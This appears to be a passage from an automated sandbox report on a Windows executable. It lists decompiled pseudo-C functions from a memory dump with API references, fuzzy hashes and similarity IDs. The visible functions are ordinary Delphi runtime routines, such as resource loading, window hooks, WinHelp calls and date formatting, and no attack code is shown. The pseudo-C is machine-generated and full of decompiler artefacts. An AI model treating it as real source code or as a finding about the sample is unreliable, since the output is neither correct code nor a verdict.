GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,004206B3,?,?,?,?,0041F297), ref: 0041E1DE
SelectObject.GDI32(00000000,00000000), ref: 0041E1EA
DeleteDC.GDI32(00000000), ref: 0041E1F0

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: ObjectSelect$ColorDeleteTable
String ID:
API String ID: 3862836420-0
Opcode ID: ee732dd7c19ca15d241b6d8aa4919e4cb8b1ed1dea575a39d2d56be08379786a
Instruction ID: 5aa1a43ce8c665b3033a090e8f6bf31adb0acf8d95989d8af2e3b2827e97019d
Opcode Fuzzy Hash: ee732dd7c19ca15d241b6d8aa4919e4cb8b1ed1dea575a39d2d56be08379786a
Instruction Fuzzy Hash: 4301847560431076E614A7679D57AAB72EC8FC0718F01C92FF989972C2E67C8845839A

Uniqueness

Uniqueness Score: -1.00%

Function 00416400, Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00416400(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t29 = FindResourceA(__edx, _v8, _a4);
				 *(_t23 + 0x10) = _t29;
				_t33 = _t29;
				if(_t29 == 0) {
					E00416390(_t23, _t24, _t29, _t31, _t33, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0x4164a4
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				_t34 = _t30;
				if(_t30 == 0) {
					E00416390(_t23, _t24, _t30, _t31, _t34, _t32);
				}
				_t7 = _t23 + 0x10; // 0x4164a4
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0x416168
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E00416128(_t23, _t25, _t18);
			}

0x00416407
0x0041640a
0x0041640c
0x0041641c
0x0041641e
0x00416421
0x00416423
0x00416426
0x0041642b
0x0041642b
0x0041642c
0x00416436
0x00416438
0x0041643b
0x0041643d
0x00416440
0x00416445
0x00416446
0x00416450
0x00416451
0x00416455
0x0041645e
0x00416469

APIs

FindResourceA.KERNEL32(?,?,?), ref: 00416417
LoadResource.KERNEL32(?,004164A4,?,?,?,004122D4,?,00000001,00000000,?,00416370,?), ref: 00416431
SizeofResource.KERNEL32(?,004164A4,?,004164A4,?,?,?,004122D4,?,00000001,00000000,?,00416370,?), ref: 0041644B
LockResource.KERNEL32(00416168,00000000,?,004164A4,?,004164A4,?,?,?,004122D4,?,00000001,00000000,?,00416370,?), ref: 00416455

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 2d9deb7d5a64a12c4e3a689ae88f5fc9eee7e2964d995190cd733733bf81b0fb
Instruction ID: 825aa1ec1ff003f80e9d0c96cc909ef71b8a577fb1871f4dbbb4c43b087467ca
Opcode Fuzzy Hash: 2d9deb7d5a64a12c4e3a689ae88f5fc9eee7e2964d995190cd733733bf81b0fb
Instruction Fuzzy Hash: D2F06DB26002046F9744EEADA881D9B77DCDE88364322046FFD08D7246DA39ED5147BC

Uniqueness

Uniqueness Score: -1.00%

Function 00429CBC, Relevance: 6.0, APIs: 4, Instructions: 37
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00429CBC(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t9;
				signed int _t16;
				struct HWND__* _t19;
				DWORD* _t20;

				_t17 = __ecx;
				_push(__ecx);
				_t19 = __eax;
				_t16 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() ==  *_t20) {
					_t9 =  *0x47bb0c; // 0x232126c
					if(GlobalFindAtomA(E004046A0(_t9)) !=  *0x47bb08) {
						_t16 = 0 | E00428E04(_t19, _t17) != 0x00000000;
					} else {
						_t16 = 0 | GetPropA(_t19,  *0x47bb08 & 0x0000ffff) != 0x00000000;
					}
				}
				return _t16;
			}

0x00429cbc
0x00429cbe
0x00429cbf
0x00429cc1
0x00429cc5
0x00429cdc
0x00429cf3
0x00429d13
0x00429cf5
0x00429d05
0x00429d05
0x00429cf3
0x00429d1b

APIs

GetWindowThreadProcessId.USER32(00000000), ref: 00429CC9
GetCurrentProcessId.KERNEL32(?,-0000000C,00000000,00429D34,00429AF6,0047BB40,00000000,004298E6,?,-0000000C,?), ref: 00429CD2
GlobalFindAtomA.KERNEL32(00000000), ref: 00429CE7
GetPropA.USER32(00000000,00000000), ref: 00429CFE

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Process$AtomCurrentFindGlobalPropThreadWindow
String ID:
API String ID: 2582817389-0
Opcode ID: be624f69449041e11262bd9f58456c00d29f21a9a6ce0bf69cdc41924047b232
Instruction ID: dc55b1bc5ea62401a37517273a61435616e8523c1b197546111c438156e2348a
Opcode Fuzzy Hash: be624f69449041e11262bd9f58456c00d29f21a9a6ce0bf69cdc41924047b232
Instruction Fuzzy Hash: 09F0A066312531579B21BB677D8197F128CCE02368BD1843BFC00E3196EB2CDC91E2AE

Uniqueness

Uniqueness Score: -1.00%

Function 00428E38, Relevance: 6.0, APIs: 4, Instructions: 35
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00428E38(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t5;
				struct HWND__* _t12;
				void* _t15;
				DWORD* _t16;

				_t13 = __ecx;
				_push(__ecx);
				_t12 = __eax;
				_t15 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() ==  *_t16) {
					_t5 =  *0x47bb10; // 0x2321288
					if(GlobalFindAtomA(E004046A0(_t5)) !=  *0x47bb0a) {
						_t15 = E00428E04(_t12, _t13);
					} else {
						_t15 = GetPropA(_t12,  *0x47bb0a & 0x0000ffff);
					}
				}
				return _t15;
			}

0x00428e38
0x00428e3a
0x00428e3b
0x00428e3d
0x00428e41
0x00428e58
0x00428e6f
0x00428e8a
0x00428e71
0x00428e7f
0x00428e7f
0x00428e6f
0x00428e91

APIs

GetWindowThreadProcessId.USER32(?), ref: 00428E45
GetCurrentProcessId.KERNEL32(?,?,?,00000000,00000000,00429908,?,-0000000C,?), ref: 00428E4E
GlobalFindAtomA.KERNEL32(00000000), ref: 00428E63
GetPropA.USER32(?,00000000), ref: 00428E7A

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Process$AtomCurrentFindGlobalPropThreadWindow
String ID:
API String ID: 2582817389-0
Opcode ID: 071d3087b0a16e43fb508f3ed079163a4f3f1fdf2d9abbbe47a10eaa9a3a288e
Instruction ID: fa68e92e0b77d8bf8320e03fda03b315f72a48c1daf686a2cceec40ce78937ed
Opcode Fuzzy Hash: 071d3087b0a16e43fb508f3ed079163a4f3f1fdf2d9abbbe47a10eaa9a3a288e
Instruction Fuzzy Hash: F5F0125270313456E960B7A66C8192F218C8F0575438A493FFD05E7256DA3D9C50C2FD

Uniqueness

Uniqueness Score: -1.00%

Function 00449BF0, Relevance: 6.0, APIs: 4, Instructions: 34
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00449BF0(void* __ecx) {
				void* _t2;
				DWORD* _t7;

				_t2 =  *0x47bb9c; // 0x2321704
				if( *((char*)(_t2 + 0xa5)) == 0) {
					if( *0x47bbb4 == 0) {
						_t2 = SetWindowsHookExA(3, E00449BAC, 0, GetCurrentThreadId());
						 *0x47bbb4 = _t2;
					}
					if( *0x47bbb0 == 0) {
						_t2 = CreateEventA(0, 0, 0, 0);
						 *0x47bbb0 = _t2;
					}
					if( *0x47bbb8 == 0) {
						_t2 = CreateThread(0, 0x3e8, E00449B50, 0, 0, _t7);
						 *0x47bbb8 = _t2;
					}
				}
				return _t2;
			}

0x00449bf1
0x00449bfd
0x00449c06
0x00449c18
0x00449c1d
0x00449c1d
0x00449c29
0x00449c33
0x00449c38
0x00449c38
0x00449c44
0x00449c57
0x00449c5c
0x00449c5c
0x00449c44
0x00449c62

APIs

GetCurrentThreadId.KERNEL32 ref: 00449C08
SetWindowsHookExA.USER32(00000003,00449BAC,00000000,00000000), ref: 00449C18
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00449C33
CreateThread.KERNEL32(00000000,000003E8,00449B50,00000000,00000000), ref: 00449C57

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: CreateThread$CurrentEventHookWindows
String ID:
API String ID: 1195359707-0
Opcode ID: 9893fee68683f0ccf2c602fb5176bdd3d3002154e8c533b20315aa4d11584b9f
Instruction ID: 3afaaa722443c625be132c828b029b193969c113832c3a868a9e92f2de38a3c6
Opcode Fuzzy Hash: 9893fee68683f0ccf2c602fb5176bdd3d3002154e8c533b20315aa4d11584b9f
Instruction Fuzzy Hash: 1DF0FE70B88344AEF760BB60AC8AF273698E314B16F1000BEF609795D5C7B92DD0975D

Uniqueness

Uniqueness Score: -1.00%

Function 00406B14, Relevance: 6.0, APIs: 4, Instructions: 11
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406B14(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}

0x00406b17
0x00406b1e
0x00406b23
0x00406b29
0x00406b2e

APIs

GlobalHandle.KERNEL32 ref: 00406B17
GlobalUnWire.KERNEL32(00000000), ref: 00406B1E
GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406B23
GlobalFix.KERNEL32(00000000), ref: 00406B29

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Global$AllocHandleWire
String ID:
API String ID: 2210401237-0
Opcode ID: dd0af09868c75cb0275c6e7709d4b38ad3534b4c99d0890db1c8dd30b2df49b7
Instruction ID: 23714a7e4814d893240f0fea2ed11334475c3c26e64ac68e2a7c1bb564b1283a
Opcode Fuzzy Hash: dd0af09868c75cb0275c6e7709d4b38ad3534b4c99d0890db1c8dd30b2df49b7
Instruction Fuzzy Hash: BFB004D481030168E9047BB24C0AD7B04AC9984648393696E3C0AB688398BEA82118BA

Uniqueness

Uniqueness Score: -1.00%

Function 0042A2A8, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0042A2A8(intOrPtr __eax, intOrPtr __ecx, void* __edx, void* __fp0) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				intOrPtr _v24;
				char _v28;
				char _v36;
				void* __edi;
				void* __ebp;
				intOrPtr _t54;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t71;
				intOrPtr _t74;
				void* _t88;
				intOrPtr _t105;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t120;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr _t129;
				void* _t133;
				intOrPtr _t134;
				void* _t137;

				_t137 = __fp0;
				_v8 = __ecx;
				_t88 = __edx;
				_t124 = __eax;
				 *0x47bb18 = __eax;
				_push(_t133);
				_push(0x42a44d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t134;
				_v12 = 0;
				 *0x47bb20 = 0;
				_t135 =  *((char*)(__eax + 0x9b));
				if( *((char*)(__eax + 0x9b)) != 0) {
					E00403674(__eax, __eflags);
					__eflags =  *0x47bb18;
					if( *0x47bb18 != 0) {
						__eflags = _v12;
						if(_v12 == 0) {
							_v12 = E0042966C(1, _t124);
							 *0x47bb20 = 1;
						}
						_t128 =  *((intOrPtr*)(_v12 + 0x38));
						_t105 =  *0x428474; // 0x4284c0
						_t54 = E00403604( *((intOrPtr*)(_v12 + 0x38)), _t105);
						__eflags = _t54;
						if(_t54 == 0) {
							_t129 =  *((intOrPtr*)(_v12 + 0x38));
							__eflags =  *((intOrPtr*)(_t129 + 0x30));
							if( *((intOrPtr*)(_t129 + 0x30)) != 0) {
								L14:
								__eflags = 0;
								E00412A0C(0,  &_v36, 0);
								E0042BA70(_t129,  &_v28,  &_v36);
								_t60 = _v12;
								 *((intOrPtr*)(_t60 + 0x44)) = _v28;
								 *((intOrPtr*)(_t60 + 0x48)) = _v24;
								L15:
								__eflags =  *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48));
								E00412A0C( *(_v12 + 0x44) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x48)),  &_v28,  *((intOrPtr*)(_v12 + 0x48)) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x38)) + 0x4c)));
								_t65 = _v12;
								 *((intOrPtr*)(_t65 + 0x4c)) = _v28;
								 *((intOrPtr*)(_t65 + 0x50)) = _v24;
								goto L16;
							}
							_t116 =  *0x428474; // 0x4284c0
							_t71 = E00403604(_t129, _t116);
							__eflags = _t71;
							if(_t71 != 0) {
								goto L14;
							}
							GetCursorPos( &_v20);
							_t74 = _v12;
							 *(_t74 + 0x44) = _v20.x;
							 *((intOrPtr*)(_t74 + 0x48)) = _v20.y;
							goto L15;
						} else {
							GetWindowRect(E0043260C(_t128), _v12 + 0x44);
							L16:
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							L17:
							E0042A138(_v12, _v8, _t88, _t133, _t137);
							_pop(_t115);
							 *[fs:eax] = _t115;
							return 0;
						}
					}
					_pop(_t120);
					 *[fs:eax] = _t120;
					return 0;
				}
				E00403674(__eax, _t135);
				if( *0x47bb18 != 0) {
					__eflags = _v12;
					if(_v12 == 0) {
						_v12 = E00429554(_t124, 1);
						 *0x47bb20 = 1;
					}
					goto L17;
				}
				_pop(_t123);
				 *[fs:eax] = _t123;
				return 0;
			}

0x0042a2a8
0x0042a2b1
0x0042a2b4
0x0042a2b6
0x0042a2b8
0x0042a2c0
0x0042a2c1
0x0042a2c6
0x0042a2c9
0x0042a2ce
0x0042a2d1
0x0042a2d8
0x0042a2df
0x0042a335
0x0042a33a
0x0042a341
0x0042a350
0x0042a354
0x0042a364
0x0042a367
0x0042a367
0x0042a371
0x0042a376
0x0042a37c
0x0042a381
0x0042a383
0x0042a3a1
0x0042a3a4
0x0042a3a8
0x0042a3d5
0x0042a3da
0x0042a3dc
0x0042a3e9
0x0042a3ee
0x0042a3f4
0x0042a3fa
0x0042a3fd
0x0042a40f
0x0042a415
0x0042a41a
0x0042a420
0x0042a426
0x00000000
0x0042a426
0x0042a3ac
0x0042a3b2
0x0042a3b7
0x0042a3b9
0x00000000
0x00000000
0x0042a3bf
0x0042a3c4
0x0042a3ca
0x0042a3d0
0x00000000
0x0042a385
0x0042a394
0x0042a429
0x0042a432
0x0042a433
0x0042a434
0x0042a435
0x0042a436
0x0042a43e
0x0042a445
0x0042a448
0x00000000
0x0042a448
0x0042a383
0x0042a345
0x0042a348
0x00000000
0x0042a348
0x0042a2ea
0x0042a2f6
0x0042a305
0x0042a309
0x0042a31d
0x0042a320
0x0042a320
0x00000000
0x0042a309
0x0042a2fa
0x0042a2fd
0x00000000

Strings

dsB, xrefs: 0042A35A

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID:
String ID: dsB
API String ID: 0-744468583
Opcode ID: 6fb7f05c8a38dd1a6429b328a0413db970e6a339a96b5d170f31d2b4e5a021db
Instruction ID: fd3f7e190ca731340d96629e88ff5f33280288a9cd23e29a295a5fe674fe5551
Opcode Fuzzy Hash: 6fb7f05c8a38dd1a6429b328a0413db970e6a339a96b5d170f31d2b4e5a021db
Instruction Fuzzy Hash: 49519230B042199FCB10DF59E881A9EBBF5FF88318F5080AADC04A7355D775AD95CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0043EDF8, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84
keyboardCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0043EDF8(intOrPtr __eax, void* __edx) {
				char _v8;
				signed short _v10;
				intOrPtr _v16;
				char _v17;
				char _v24;
				intOrPtr _t34;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t48;
				void* _t51;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t69;
				void* _t71;
				intOrPtr _t72;

				_t69 = _t71;
				_t72 = _t71 + 0xffffffec;
				_t51 = __edx;
				_v16 = __eax;
				_v10 =  *((intOrPtr*)(__edx + 4));
				if(_v10 == 0) {
					return 0;
				} else {
					if(GetKeyState(0x10) < 0) {
						_v10 = _v10 + 0x2000;
					}
					if(GetKeyState(0x11) < 0) {
						_v10 = _v10 + 0x4000;
					}
					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
						_v10 = _v10 + 0x8000;
					}
					_v24 =  *((intOrPtr*)(_v16 + 0x34));
					_t34 =  *0x47bb90; // 0x2321244
					E004222E0(_t34,  &_v24);
					_push(_t69);
					_push(0x43eef6);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					while(1) {
						_v17 = 0;
						_v8 = E0043EAFC(_v16, 2, _v10 & 0x0000ffff);
						if(_v8 != 0) {
							break;
						}
						if(_v24 == 0 || _v17 != 2) {
							_pop(_t64);
							 *[fs:eax] = _t64;
							_push(0x43eefd);
							_t40 =  *0x47bb90; // 0x2321244
							return E004222D8(_t40);
						} else {
							continue;
						}
						goto L14;
					}
					_t42 =  *0x47bb90; // 0x2321244
					E004222E0(_t42,  &_v8);
					_push(_t69);
					_push(0x43eecb);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					_v17 = E0043ECA4( &_v8, 0, _t69);
					_pop(_t67);
					 *[fs:eax] = _t67;
					_push(0x43eed2);
					_t48 =  *0x47bb90; // 0x2321244
					return E004222D8(_t48);
				}
				L14:
			}

0x0043edf9
0x0043edfb
0x0043edff
0x0043ee01
0x0043ee0b
0x0043ee14
0x0043ef13
0x0043ee1a
0x0043ee24
0x0043ee26
0x0043ee26
0x0043ee36
0x0043ee38
0x0043ee38
0x0043ee42
0x0043ee44
0x0043ee44
0x0043ee50
0x0043ee56
0x0043ee5b
0x0043ee62
0x0043ee63
0x0043ee68
0x0043ee6b
0x0043ee6e
0x0043ee6e
0x0043ee80
0x0043ee87
0x00000000
0x00000000
0x0043eed6
0x0043eee0
0x0043eee3
0x0043eee6
0x0043eeeb
0x0043eef5
0x00000000
0x00000000
0x00000000
0x00000000
0x0043eed6
0x0043ee8c
0x0043ee91
0x0043ee98
0x0043ee99
0x0043ee9e
0x0043eea1
0x0043eeb0
0x0043eeb5
0x0043eeb8
0x0043eebb
0x0043eec0
0x0043eeca
0x0043eeca
0x00000000

APIs

GetKeyState.USER32(00000010), ref: 0043EE1C
GetKeyState.USER32(00000011), ref: 0043EE2E

Strings

, xrefs: 0043EE3E

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: State
String ID:
API String ID: 1649606143-3916222277
Opcode ID: 137f6c696247634acfa8957aa13ae892b5512e102e2887b83135f1f3b7d29743
Instruction ID: 9f16bcd781f87d17f98c35eaef72bfd8b08fe011bc7bd621bc985375d868424a
Opcode Fuzzy Hash: 137f6c696247634acfa8957aa13ae892b5512e102e2887b83135f1f3b7d29743
Instruction Fuzzy Hash: 16310634A05208EFDB11DFA6D91279EB7F5EB4C304F9194BAEC04A76D2E7785E00C668

Uniqueness

Uniqueness Score: -1.00%

Function 0042669C, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0042669C(void* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				void* _t33;
				long _t46;
				CHAR* _t48;
				void* _t55;
				intOrPtr _t67;
				void* _t74;
				char _t76;
				void* _t79;

				_t74 = __edi;
				_t78 = _t79;
				_push(__ebx);
				_push(__esi);
				_v32 = 0;
				_v8 = 0;
				_v12 = 0;
				_t76 = __edx;
				_t55 = __eax;
				_push(_t79);
				_push(0x426794);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79 + 0xffffffe4;
				_t81 = __edx;
				if(__edx == 0) {
					E0040B6D8(0x42623c, 1);
					E00403BF4();
				}
				_v28 = _t76;
				_v24 = 0xb;
				E004263E8(_t55, _t55,  &_v32, 0, _t74, _t76);
				_v20 = _v32;
				_v16 = 0xb;
				E00408D4C("IE(AL(\"%s\",4),\"AL(\\\"%0:s\\\",3)\",\"JK(\\\"%1:s\\\",\\\"%0:s\\\")\")", 1,  &_v28,  &_v8);
				_t33 = E00426D2C(_t55, _t74, _t78, _t81);
				_t82 = _t33;
				if(_t33 != 0) {
					E004263E8(_t55, _t55,  &_v12, 0, _t74, _t76);
					if(E00426C84(_t55, _t55, _v8, 1, _t76, _t82, 0) != 0 && _v12 != 0) {
						 *((char*)(_t55 + 0x10)) = 1;
						E00404234(_t55 + 0x14, _v8);
						_t46 = E004046A0(_v8);
						_t48 = E004046A0(_v12);
						WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x1c)))) + 0xc))(), _t48, 0x102, _t46);
					}
				}
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(0x42679b);
				E004041E0( &_v32);
				return E00404204( &_v12, 2);
			}

0x0042669c
0x0042669d
0x004266a2
0x004266a3
0x004266a6
0x004266a9
0x004266ac
0x004266af
0x004266b1
0x004266b5
0x004266b6
0x004266bb
0x004266be
0x004266c1
0x004266c3
0x004266d1
0x004266d6
0x004266d6
0x004266df
0x004266e2
0x004266ed
0x004266f5
0x004266f8
0x00426709
0x00426710
0x00426715
0x00426717
0x00426720
0x00426735
0x0042673d
0x00426747
0x0042674f
0x0042675d
0x0042676c
0x0042676c
0x00426735
0x00426773
0x00426776
0x00426779
0x00426781
0x00426793

APIs

WinHelpA.USER32(00000000), ref: 0042676C

Strings

D-B, xrefs: 004266CC
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")"), xrefs: 00426704

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Help
String ID: D-B$IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
API String ID: 2830496658-2816275659
Opcode ID: 0f49b4322bb3220dd9894c9258f2b34ae4e3e11a84cd114224d755eadfeb2466
Instruction ID: 81b62ded76a7deaaaeea822c435f77c610379b76ef7abb8dd24a3da2bca9e890
Opcode Fuzzy Hash: 0f49b4322bb3220dd9894c9258f2b34ae4e3e11a84cd114224d755eadfeb2466
Instruction Fuzzy Hash: 3F317574B002189BDB04EF65E88169EB7B49F48308F9144BAF801A7382DB7D9E05CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00409BFC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74
threadCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00409BFC(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				char* _t32;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t63;
				void* _t67;

				_v8 = 0;
				_t49 = __edx;
				_t63 = __eax;
				_push(_t67);
				_push(0x409cda);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffeec;
				E004041E0(__edx);
				_v24 =  *((intOrPtr*)(_a4 - 0xe));
				_v22 =  *((intOrPtr*)(_a4 - 0x10));
				_v18 =  *((intOrPtr*)(_a4 - 0x12));
				if(_t63 > 2) {
					E00404278( &_v8, 0x409cfc);
				} else {
					E00404278( &_v8, 0x409cf0);
				}
				_t32 = E004046A0(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
					E00404450(_t49, 0x100,  &_v280);
					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
						E00404700( *_t49, E004044A0( *_t49) - 1, 2, _t49);
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(E00409CE1);
				return E004041E0( &_v8);
			}

0x00409c09
0x00409c0c
0x00409c0e
0x00409c12
0x00409c13
0x00409c18
0x00409c1b
0x00409c20
0x00409c2c
0x00409c37
0x00409c42
0x00409c49
0x00409c62
0x00409c4b
0x00409c53
0x00409c53
0x00409c76
0x00409c8f
0x00409c9e
0x00409ca4
0x00409cbf
0x00409cbf
0x00409ca4
0x00409cc6
0x00409cc9
0x00409ccc
0x00409cd9

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00409CDA), ref: 00409C82
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,00409CDA), ref: 00409C88

Strings

yyyy, xrefs: 00409C5D

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
